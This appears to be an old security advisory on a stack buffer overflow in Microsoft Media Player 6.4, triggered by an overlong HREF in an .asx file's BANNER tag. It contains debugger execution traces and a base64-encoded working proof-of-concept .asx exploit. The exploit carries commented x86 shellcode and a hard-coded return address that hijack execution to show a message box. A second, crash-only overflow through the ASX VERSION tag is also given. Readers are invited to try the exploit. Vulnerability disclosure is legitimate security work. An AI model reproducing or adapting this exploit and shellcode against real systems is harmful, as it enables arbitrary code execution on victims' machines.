COMMAND
Media Player
SYSTEMS AFFECTED
Microsoft Media Player 6.4
PROBLEM
Pauli Ojanpera found following. HREF attribute of BANNER tag can
be abused to smash our lovely stack. This information applies to
Media Player 6.4 at least. You can try it out with your version
at
http://mediaplayerbug.tripod.com/
As what comes to the .asx attachment, it won't work as it is.
You've got to edit it to refer a valid .asf/.avi file. It is a
text file so that should not be too much a trouble.
Execution path of DXMASF.DLL (Time stamp 0x3a2ed2f1.) in detail
follows. This is the recently patched one.
1D3612BD : MSDXM!0x1D3197F0( 0x00298678, 0x0009e724, 0x002a015c ) {
1D3197F0 :
1D319843 : Kernel32!LoadLibraryA("dxmasf.dll")
1D319858 : Kernel32!GetProcAddress("UtilLoadImage",0x11f00000,0)
1D31987A : Kernel32!0x77F350A3(0,0,0x9e724,-1,0x6f13c,0x825,0,0)
1D319895 : DXMASF!UtilLoadImage( ? )
1FF26708 :
1FF26731 : 1FF26A97()
1FF2673C : 1FF26AA1()
1FF26AA1 :
1FF26AB5 : 1FF26C2A()
1FF26ACC : Kernel32!0x77F1297C() 1FF010D8
1FF26AD4 : 1FF3EFA6()
1FF26AE0 : Kernel32!0x77F127E6() 1FF0108C
1FF26AFE : 1FF3F3E8()
1FF26B44 : 1FF3F2B4()
1FF26B5C : 1FF3F260()
1FF26BB5 : Wininet!0x702079AB() 1FF012F0
1FF26BF3 : Kernel32!0x77F1297C() 1FF010D8
1FF26BFB : 1FF3EFA6()
1FF26C0C : Kernel32!0x77F127E6() 1FF0108C
1FF26C19 : } <- Let the parties begin!
1FF26741 :
1D319898 :
1D3612C0 :
Execution path of DXMASF.DLL (Time stamp 0x382cbe58.) in detail
follows:
1D319895 : DXMASF!UtilLoadImage( ? ) {
1FF26716 :
1FF2674A : 1FF26AAF( x ) {
1FF26ADA : Kernel32!0x77F1297C( x ) 1FF010D8
1FF26AE2 : 1FF3EFB6()
1FF26AEE : Kernel32!0x77F127E6() 1FF0108C
1FF26B0C : 1FF3F3F8() (retrieve the string address at heap?)
1FF26B3B : movs
1FF26B52 : 1FF3F2C4:7801FAAD:fopen() (fails)
1FF26B6A : 1FF3F270:780252FE:strrchr() (strip "C:\")
1FF26BAC : movs
1FF26BC3 : WININET!0x702079AB() 1FF012F0 (try if it's an URL?)
1FF26BE8 : movs (copy back the stripped string)
1FF26C01 : Kernel32!0x77F1297C() 1FF010D8
1FF26C09 : 1FF3EFB6:780037CA:new()
1FF26C1A : Kernel32!0x77F127E6() 1FF0108C
1FF26C27 : } <- Let the parties begin!
1FF2674F :
}
1D319898 :
Execution path of DXMASF.DLL (Time stamp 0x35ed5d3d.) in detail
follows. This is the SP4 one.
1D319895 : DXMASF!UtilLoadImage=1FF34CCD() {
1FF34CF6 : 1FF3505C() (dummy init)
1FF34D01 : 1FF35066( 0x0006F13C ) {
1FF3507A : 1FF351BF()
1FF35091 : Kernel32!0x77F1297C( 0x0006F13C ) 1FF010E8
1FF35099 : 1FF368A6:780037CA:new( 0x178 ) 1FF011E8
1FF350A5 : Kernel32!0x77F127E6( heapbuf(0x002A8C90), 0x0006F13C )1FF01080
{
77F1282F : movs
}
1FF350AB :
1FF350C4 : URLMON!0x702B7BC2( 0, 0x2A8C90, 0x6EFA0, 0x104 ) 1FF01328 {
702B7BE0 : Kernel32!0x77F1297C() (strlen)
702B7BF1 : URLMON!0x702B753C( 0x44 )
702B7C15 : to_wide_char( 0, 0, 0x2A8FD0, -1, 0x6EDF0 ) 702712B8
702B7C26 : OLE32!0x77B2122C( 0x208, 0x6EDF0 )
702B7C44 : 702B77F8()
702B7C65 : Kernel32!0x77F12AE7()
702B7C72 : Kernel32!0x77F350A3()
}
1FF350EB : 1FF36D9E:7801FAAD:fopen( 0x6EFA0, 0x1FF057A0 )
1FF350CF : 1FF368A0:78003C6E:delete( 0x2A8C90 ) 1FF011E0
}
1D319898 :
The exploit:
---
Content-Type: application/octet-stream; name="money_is.asx"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="money_is.asx"
Content-MD5: sufRvxI3fg7ZHjoilGHiHw==
PEFTWCB2ZXJzaW9uPSIzLjAiPg0KPCEtLQ0KLSBTbyB0aGUgSFJFRiBhdHRyaWJ1dGUgdmFs
dWUgb2YgQkFOTkVSIHRhZyBpcyB0byBvdmVyZmxvdyBzb29uLg0KLSBUaGUgY2hhcmFjdGVy
IGJlZm9yZSB0aGUgbGFzdCBvbmUgc2hvdWxkIGJlICdcJyB0byBhdm9pZCBtYW5nbGluZw0K
dGhlIGNvZGUgZWFybGllciBpbiB0aGUgZnVuY3Rpb24uIEkgZG9uJ3Qga25vdyBpZiB0aGlz
IGlzIG1hbmRhdG9yeQ0KdGhvdWdoLg0KLSA0IGNoYXJhY3RlcnMgZm9yd2FyZCBmcm9tIHN0
cmluZyBvZmZzZXQgMjY1IGFyZSBsb2FkZWQgaW50byBFQVgNCmJlZm9yZSBSRVQuDQotIDQg
Y2hhcmFjdGVycyBmb3J3YXJkIGZyb20gc3RyaW5nIG9mZnNldCAyNjkgYXJlIGxvYWRlZCBp
bnRvIEVCUA0KYmVmb3JlIFJFVC4NCi0gSSBzdGFydCBtZXNzaW5nIHdpdGggUkVUJ3MgZm9y
d2FyZCBmcm9tIDI3M3RoIGJ5dGUgb2YgdGhlIHN0cmluZy4NCi0gSSBjaG9zZSB0aGUgcmV0
dXJuIGFkZHJlc3MgdG8gYmUgMHgxRkYwQkI5QSB3aGljaCBpcyBpbiBEWE1BU0YuRExMDQpp
dHNlbGYgYW5kIGlzIHRoZSBzYW1lIGluIGJvdGggdnVsbmVyYWJsZSB2ZXJzaW9ucyBJIGhh
ZCBhY2Nlc3MgdG8uDQotIFRoZSByZXR1cm4gYWRkcmVzcyBjb250YWlucyB0aGlzIGNvZGU6
ICJSRVQgNCIgKD0gQzIgMDQgMDApLg0KLSBUaGUgY29kZSBhbGxvd3MgdG8gcmVjdXJzZSBp
biB0aGUgc3RhY2sgdG8gYSB1c2FibGUgcG9pbnRlciB0aGF0DQpwb2ludHMgdG8gdGhlIGJl
Z2lubmluZyBvZiB0aGUgc3RyaW5nLiBObyBjaGFyYWN0ZXJzIGFsbG93ZWQgYWZ0ZXINCnRo
YXQgcG9pbnQgdG8gYXZvaWQgb3ZlcndyaXRpbmcgdGhlIGFkZHJlc3MuDQotIEV4ZWN1dGlv
biBiZWdpbnMgYXQgIkM6XCFBIiAod2l0aG91dCBwYXJlbnRoZXNpcy4pIFRoZXNlIGNoYXJh
Y3RlcnMNCmZvcm0gdmFsaWQgaW5zdHJ1Y3Rpb25zIHNvIHRoZXkgZG9uJ3QgZG8gYW55IGhh
cm0uDQoNCkVCIDMyIAkJCTsgam1wIGZvcndhcmQNCjVGCQkJOyBwb3AgZWRpIAkJOyBnb3Qg
dGhlIG1lc3NhZ2Ugc3RyaW5nIGFkZHJlc3MNCjMzIEMwIAkJCTsgeG9yIGVheCxlYXgNCjUw
IAkJCTsgcHVzaCBlYXggCQk7IHB1c2ggMA0KNTcJCQk7IHB1c2ggZWRpCQk7IHB1c2ggbWVz
c2FnZSBzdHJpbmcgYWRkcmVzcw0KDQo4MyBFRiAwNgkJOyBzdWIgZWRpLCA2DQpBQQkJCTsg
c3Rvc2INCjgzIEM3IDE2CQk7IGFkZCBlZGksIDIyDQpBQQkJCTsgc3Rvc2IJCQk7IHNldCB0
ZXJtaW5hdG9yIGJ5dGUNCjU3IAkJCTsgcHVzaCBlZGkgCQk7IHB1c2ggY2FwdGlvbiBzdHJp
bmcgYWRkcmVzcw0KODMgQzcgMzYJCTsgYWRkIGVkaSwgNTQNCkFBCQkJOyBzdG9zYgkJCTsg
c2V0IHRlcm1pbmF0b3IgYnl0ZQ0KNTAgCQkJOyBwdXNoIGVheCAJCTsgcHVzaCAwDQpGRiAx
NSA3QyAxMiBGMCAxRiAJOyBjYWxsIFsxRkYwMTI3Q10gCTsgY2FsbCBNZXNzYWdlQm94QQ0K
DQpCOCBBOCBGRiBGOCA3RgkJOyBtb3YgZWF4LCA3RkY4RkZBOA0KRjcgRDAJCQk7IG5vdCBl
YXgNCjVGCQkJOyBwb3AgZWRpCQkNCjVGCQkJOyBwb3AgZWRpCQkNCjVGCQkJOyBwb3AgZWRp
DQo1RgkJCTsgcG9wIGVkaQ0KNUUJCQk7IHBvcCBlc2kNCjVCCQkJOyBwb3AgZWJ4DQoNCjhC
IEVDCQkJOyBtb3YgZWJwLCBlc3AJCQ0KODEgRUQgQ0MgRjcgRkYgRkYJOyBzdWIgZWJwLCAt
MjEwMA0KDQpDOQkJCTsgbGVhdmUNCkMyIDBDIHh4CQk7IHJldCAweEMNCkU4IEM5IEZGIEZG
IEZGIAkJOyBjYWxsIGJhY2t3YXJkDQpkYiAnRHJ1Z3MgYXJlIGJhYWQuLi4nDQpkYiAnWW91
IHNob3VsZCBub3QgdXNlIGRydWdzLiBZb3Uga25ldyB0aGF0PyBPaCBzaWxseSBtZWUuJw0K
LS0+DQo8QkFOTkVSIEhSRUY9IkM6XCFB6zJfM8BQV4PvBqqDxxaqV4PHNqpQ/xV8EvAfuKj/
+H/30F9fX19eW4vsge3M9///ycIMeOjJ////RHJ1Z3MgYXJlIGJhYWQuLi54WW91IHNob3Vs
ZCBub3QgdXNlIGRydWdzLiBZb3Uga25ldyB0aGF0PyBPaCBzaWxseSBtZWUueEFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQT1lYXg9ZWJwmrvwH0FBQUGau/AfQUFBQZq78B9BQUFBmrvwH0FBQUGa
u/AfQUFBQZq78B9BQUFBmrvwH0FBQUGau/AfQUFBQZq78B9BQUFBmrvwH0FBQUGau/AfQUFB
QZq78B9BQUFBmrvwH0FcQSIvPg0KPEVOVFJZPjxSRUYgSFJFRj0iY2xvY2suYXZpIiAvPjwv
RU5UUlk+DQo8L0FTWD4NCg==
-----
ByteRage found yet another bof condition in the ASX VERSION tag :
an *.ASX file with the contents:
<ASX VERSION="AAAAAAAAAAA ... AAAAAAA">
crashes MPLAYER 6.4 in dxmasf.dll...
SOLUTION
Nothing yet.